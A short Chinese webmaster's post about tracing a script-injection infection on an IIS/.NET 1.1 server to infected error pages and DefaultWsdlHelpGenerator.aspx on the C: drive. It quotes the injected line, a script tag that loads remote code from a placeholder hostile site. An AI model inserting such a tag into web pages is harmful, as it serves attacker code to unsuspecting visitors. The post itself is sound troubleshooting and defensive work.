服务器中毒了,所有的HTM/ASPX/ASP等文件,都加了一段恶意代码在最后,类似于:
<script src=http://贱人网站/images/images/1.css></script>
在网站目录下面用文本替换软件狂杀了一通,全部扫干净了,BS系统也没有出现中毒代码了~
可是当我访问ASMX的时候,出事了,在VS里面添加ASMX,因为JS病毒阻碍了VS内嵌IE加载ASMX文件分析,所以无法添加这个WEB SERVICE。用FLASHGET下载一看,得,病毒代码就在里面。
可众所周知,ASMX文件里面就一行:
<%@ WebService Language="vb" Codebehind="什么什么Service.asmx.vb" Class="什么什么Service" %>
并没有病毒代码。而这现在的病毒都很懒,总不至于侵入我的.net 1.1的DLL来输出病毒代码吧?咋办涅?看来得从ASMX文件的生成过程入手。
可GOOGLE了半天,并没有很详细的中文资料,MSDN貌似也没有详细解释ASMX页面的生成,去K英文的资料慢慢摸索吧,又太慢了。
恰好这个时候,在浏览器里面输网址的时候,打错了一个字母,出了个404错误页面……奇怪了,怎么好像IE在加载病毒代码?恍然大悟,IIS里面不是针对所有的错误都有自定义错误页面吗?马上到IIS的设置一看,果然,在C:\windows\help\iishelp\common里面。看来病毒应该是感染了C盘的文件,而ASMX的渲染(Render)又使用了某些C盘上的文件,而这些文件很可能就在.net的framework目录下。果然,一搜索就发现C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\CONFIG\DefaultWsdlHelpGenerator.aspx有病毒,删除后,马上就好了。
教训
1、杀毒要均匀,不要忘了C盘(实在是低级错误啊)
2、DefaultWsdlHelpGenerator.aspx实际上是VS的一个模板文件,在VS和.net环境下,有很多类似D东东,以后要多多,多多,多多,多多探索和学习
